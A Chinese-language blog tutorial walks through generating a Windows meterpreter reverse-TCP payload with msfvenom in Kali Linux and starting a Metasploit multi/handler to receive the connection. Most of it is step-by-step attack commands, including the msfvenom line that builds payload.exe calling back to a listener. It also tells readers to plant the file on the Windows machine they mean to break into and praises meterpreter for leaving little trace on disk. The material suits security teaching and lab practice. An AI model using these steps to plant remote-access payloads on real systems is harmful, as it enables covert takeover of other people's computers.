上一章内容讲述了远程控制程序的原理,本章内容利用kali linux自带的Metasploit来完成被控程序和主控。今天,错误博客( cuowu.com )分享的是《Kali Linux中Metasploit利用msfvenom生成被控程序与启动主控端》。希望对大家有所帮助。
一、msfvenom命令
Metasploit中的msfvenom是最简单和强大的一款远程控制软件了。几个常见参数如下。
Option:
-p,–payload,<payload>指定要生成的payload(攻击荷载)。如果需要使用自定义的payload,请使用‘-’或者stdin指定。
-f,–format,<format>指定输出格式(可以使用 –help-formats来获取msf支持的输出格式列表)
-o,–out <path>指定存储payload的位置
–payload-options 列举payload的标准选项
–help-formats 查看msf支持的输出格式列表
参数比较多,但是通常我们只是希望生成一个简单的被控端程序,那么只需要使用参数-p、-f和-o即可,分别指定要使用的被控端程序(通常可以使用Metasploit中内置的被控端程序)、要用的平台(Windows、osx等)和保存的位置。
二、kali中生成被控制端程序
在kali linux中直接输入以下命令就可以在root下生成一个payload.exe的被控端文件。
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.130.6 lport=5000 -f exe -o /root/payload.exe
下面解释一下每个代码的意思。
msfvenom:Metasploit程序内置的远程控制命令。
-p:指定要生成的payload,即攻击荷载。
windows:适用于Windows系统的。
meterpreter:采用meterpreter主控的。
reverse_tcp lhost:指定接收端host的ip。
lport:指定端口。
-f:指定格式为exe。
-o:指定存储payload位置,即/root/下。
解释一下这句话就是:
最简单的msfvenom命令生成的一个被控制程序,使用的被控端程序就是一个用于Windows平台下的反向远程控制程序:Windows/meterpreter/reverse_tcp,它的参数lhost的值为192.168.130.6,这个ip地址是kali linux的本地ip。
如果操作正确,会得到如下图所示的结果:

生成了,但是找不到文件位置了,所以,就更换了个位置:/home/kali/Desktop/这样子就到桌面上了。
然后把这个文件放到想要入侵的Windows7系统中。

三、kali中启动主控端
如果我们在Windows7系统中运行payload.exe的话,这台计算机会立刻回连到192.168.130.6上,不过我们还没有启动主控端,所以,我们需要先启动主控端。
1、启动Metasploit
msfconsole

2、handler主控端
在Metasploit中使用handler来作为主控端,halder位于exploit下的multi目录下,故启动handler的命令如下:
use exploit/multi/handler
set payload windows/meterpreter/revese_tcp (这条之前漏了,就没办法执行成功了,这里补上。)
然后进入了handler后,我们需要知道handler需要配置哪些参数,于是,我们输入options来查看需要设置哪些参数。

Required下面是yes的选项都是必须设置的,之前我们设置的LPORT端口是5000,所以我们现在需要设置为5000,LHOST设置为之前的192.168.130.6。Metasploit下的设置为set命令,即如下一条条执行:
set lhost 192.168.130.6
set lport 5000
设置完成后,再次输入options就可以发现我们已经设置好了。

最后输入exploit等待对方上线。
exploit

上述步骤中漏了一步set之前的payload文件也就是之前的被控端程序,所以开启msf不显示starting the payload handler….
set payload windows/meterpreter/revese_tcp

在Windows7系统中双击payload就可以看到kali中出现了一个session,也就是会话,这表示从现在起,我们可以通过被控制端程序来控制目标计算机了。同时,我们可以看到上图中出现meterpreter,这就是一个被控程序,meterpreter是运行在内存中的,通过注入dll文件实现,在目标计算机的硬盘上不会留下文件痕迹,所以在被入侵时很难找到。

meterpreter输入ls就可以查看payload.exe文件所在的当前目录有哪些文件,如上图所示。
以上就是错误博客( cuowu.com )分享的是《Kali Linux中Metasploit利用msfvenom生成被控程序与启动主控端》。感谢您的阅读。
百度搜索“错误博客”即可找到本站,微信搜索“小小课堂网”关注小小课堂网公众号。错误博客( cuowu.com )欢迎用户投稿,发布者:中二少年,文章版权归作者所有,投稿文章不代表错误博客立场,中二少年发布为错误博客原创文章,转载请注明出处:https://cuowu.com/2452.html